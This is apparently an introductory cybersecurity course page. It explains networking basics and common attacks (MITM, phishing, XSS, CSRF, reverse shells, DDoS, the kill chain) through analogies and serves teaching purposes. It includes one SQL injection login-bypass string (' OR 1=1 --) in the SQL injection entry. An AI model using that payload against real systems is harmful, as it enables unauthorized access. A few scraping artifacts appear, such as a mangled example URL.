Learn Cybersecurity from Beginner to Advanced using interactive animated HTML simulations. Each concept is visualized step-by-step to understand real-world networking and attacks clearly.
This is the standard architecture of the internet.
The Concept: One computer (the Client) makes a request, and another computer (the Server) fulfills it.
Analogy: A customer (Client) ordering food at a restaurant, and the kitchen (Server) preparing and serving it.
The Concept: Computers communicate using numbers (IP addresses), but humans use names (like https://www.google.com/search?q=google.com). DNS translates the human-readable domain name into the machine-readable IP address.
Analogy: The "Phonebook" of the internet. You look up a name (website) to find their phone number (IP address).
HTTP (HyperText Transfer Protocol): Transmits data in plain text. If intercepted, anyone can read it.
HTTPS (S - Secure): Encrypts the data using TLS/SSL. If intercepted, it looks like gibberish.
Key Difference: HTTP is like sending a postcard (readable by anyone); HTTPS is like sending a sealed, locked briefcase.
IP Address: The unique address that identifies a device on a network (e.g., 192.168.1.1).
Port: A specific docking point on that device for a specific service (e.g., Web traffic usually uses Port 80 or 443).
Analogy: The IP address is the Street Address of a building. The Port is the specific Apartment Number inside that building.
Feature TCP (Transmission Control Protocol):
The "Reliable Delivery" Method
TCP is like sending a Registered Letter. You get a receipt confirming it arrived, and if it gets lost, the post office sends it again.
Connection-Oriented: It performs a "Three-Way Handshake" (Hello? -> Hi! -> Okay, let's talk) before sending any data.
Guaranteed Delivery: If a piece of data (packet) is lost, TCP notices and resends it.
Ordered: It ensures data arrives in the exact order it was sent (1, 2, 3...).
Use Case: Web browsing (HTTP/HTTPS), Email (SMTP), and File Transfers (FTP). You wouldn't want an email to arrive with missing words!
UDP (User Datagram Protocol):
The "Fire and Forget" Method
UDP is like a Live Radio Broadcast. The station sends the signal out; if you miss a second of audio because of static, the station doesn't stop and replay it for you—it just keeps going.
Connectionless: No handshake. It just starts "firing" data at the destination immediately.
No Guarantees: If a packet is lost, it's gone forever. There is no retransmission.
Faster: Because it doesn't check for errors or wait for receipts, it is much faster and "lighter" than TCP.
Use Case: Online gaming, Live streaming, and Video calls (Zoom/Teams). It’s better to have a tiny glitch in a video call than for the whole call to freeze while it waits for a "lost" frame.
The Concept: A security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Analogy: A security guard at a gated community who checks every car's ID against a list of allowed visitors before letting them in.
The Concept: The process of converting information or data into a code, especially to prevent unauthorized access.
Symmetric: Uses one key to lock and unlock.
Asymmetric: Uses a Public Key to lock (encrypt) and a Private Key to unlock (decrypt).
Authentication (Who are you?): Verifying identity (e.g., Logging in with a password).
Authorization (What can you do?): Verifying permissions (e.g., A regular user vs. an Admin).
The Concept: An attacker secretly relays and possibly alters the communication between two parties who believe they are communicating directly with each other.
Scenario: You connect to a fake public Wi-Fi named "Free Coffee". The hacker controls the router and sees everything you send to the bank.
The Concept: A social engineering attack used to steal user data, including login credentials and credit card numbers.
Mechanism: Usually occurs via email, masquerading as a trusted entity (e.g., "Urgent: Reset your Bank Password").
The Concept: An attacker interferes with the queries an application makes to its database.
Mechanism: Typing malicious code into a login box (like ' OR 1=1 --) to trick the database into revealing information or logging the attacker in without a password.
The Concept: Attackers inject malicious scripts into trusted websites viewed by other users.
Mechanism: Posting a comment on a blog that contains invisible JavaScript. When others view the comment, their browser executes the script, potentially stealing their session cookies.
The Concept: An attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.
Scenario: You are logged into your bank. You click a link in a spam email. That link secretly tells your browser to send a "Transfer Money" request to the bank, and the bank accepts it because you are logged in.
The Concept: A trial-and-error method used to obtain information such as a user password or personal identification number (PIN).
Mechanism: Trying every possible combination of characters until the correct one is found.
The Concept: The exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.
Mechanism: Stealing the "Session Cookie" so the server thinks the attacker is you.
Virus: Attaches to clean files and spreads.
Worm: Standalone malware that replicates itself to spread to other computers.
Trojan: Disguises itself as legitimate software.
Ransomware: Encrypts your files and demands payment to unlock them.
The Concept: A network of private computers infected with malicious software and controlled as a group without the owners' knowledge.
Use: Often used to send spam or launch DDoS attacks.
The Concept: A malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming the target with a flood of Internet traffic from multiple sources (Botnets).
OpenThe Concept: A vulnerability in software that is unknown to the vendor. This means there is no patch available yet.
The Name: The developers have had "zero days" to fix it.
The Concept: Standard connections are Client -> Server. In a reverse shell, the target machine (victim) is forced to initiate a connection back to the attacker.
Why? This often bypasses firewalls because firewalls usually block incoming connections but allow outgoing ones.
The Concept: Exploiting a bug or configuration oversight to gain elevated access to resources.
Vertical: Going from a User to an Admin.
Horizontal: Accessing another user's account of the same level.
The Concept: Using software/hardware (like Wireshark) to capture and analyze data packets flowing through a network.
OpenFeature IDS (Intrusion Detection System):
Action-Watch & Alert. Like a burglar alarm.
Position-Often sits "out of band" (copy of traffic).
IPS (Intrusion Prevention System):
Action-Watch & Stop. Like a guard dog that bites.
Position-Sits "in-line" (traffic flows through it).
VPN (Virtual Private Network): Creates a secure, encrypted tunnel for your data, hiding your IP address from the destination.
Tor (The Onion Router): Reroutes traffic through multiple volunteer nodes, stripping data at each layer for high anonymity.
Attacks rarely happen in isolation. They follow a chain:
Reconnaissance: Gathering info (Sniffing, Phishin>
Weaponization: Creating the malware (Trojan).
Delivery: Sending it to the victim (Email).
Exploitation: Triggering the bug (Zero-day).
Installation: Installing the backdoor (Reverse Shell).
Command & Control (C2): Taking control remotely.
Actions on Objectives: Stealing data or Ransomware.